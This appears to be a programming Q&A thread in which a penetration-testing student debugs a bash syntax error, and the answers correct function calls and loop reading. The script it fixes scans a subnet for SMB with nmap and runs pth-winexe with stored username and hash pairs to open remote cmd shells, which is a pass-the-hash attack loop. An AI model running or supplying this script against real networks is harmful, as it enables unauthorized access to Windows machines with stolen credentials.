# nested for loops in bash: unexpected token

Tags: bash, function, for-loop, awk

Trying to write a shell script for my penetration testing course that iterates through $hashfile which looks like this:

```
admin:1007:aaaaaaaaaaaaaaaaaa:bbbbbbbbbbbbbbbbbbbb:::
Administrator:500:ccccccccccccccccc:ddddddddddddddddddddd:::
someuser:1008:111111111111111111111:2222222222222222222222:::
backup:1006:33333333333333333333:44444444444444444444444444:::
```

and grabs the username in field 1 and sets $smbuser to this value, and sets smbhash to the hashes in field 3 and 4.

```
#!/bin/bash


hashfile="/root/bin/passcrack/227/hashes"

gethash() { awk -F: '{print $3 ":" $4}' < ${hashfile} }

getuser() { awk -F: '{print $1}' < ${hashfile} }

for host in $(nmap -p 445 192.168.15.200-254 -oG - | grep open | cut -d" " -f2); do 
  for line in $(cat ${hashfile}); do
   smbhash=gethash($line)
   smbuser=getuser($line)
   echo "[+]"
   echo "[+] trying $smbuser@$host with $smbhash"
   echo "[+]"
  pth-winexe -U $smbuser%$smbhash //$host cmd;
 done
done
```

The error i'm getting is this:

```
root@bleh:~/bin# ./pth.sh 

./pth.sh: line 10: syntax error near unexpected token `('
./pth.sh: line 10: `       smbhash=gethash($line)'
```

Comment: smbhash = $(gethas ${line}) and see if it works

Answer (score 2, accepted):

Instead of:

```
for line in $(cat ${hashfile}); do
   smbhash=gethash($line)
   smbuser=getuser($line)
   ...
done
```

consider:

```
while IFS=: read -r smbuser f2 f3 f4 rest; do
   smbhash="${f3}:${f4}"
   ...
done < "$hashfile"
```

It'll be more efficient and you don't need the functions at all.

Answer (score 2):

In bash, you don't put function arguments in parentheses.

If you want to call function `f` with argument `x`, just write

```
f x
```

rather than

```
f(x)
```

Answer (score 1):

Call functions the same way you'd call commands: no parentheses, just list the arguments after.

To store their output in variables, use `var=$(command)`. No spaces around the equal signs.

```
smbhash=$(gethash $line)
smbuser=$(getuser $line)
```

You should also have gotten errors about the function definitions. When you write them on one line you have to include semi-colons at the end.

```
gethash() { awk -F: '{print $3 ":" $4}' < ${hashfile}; }
getuser() { awk -F: '{print $1}' < ${hashfile}; }
```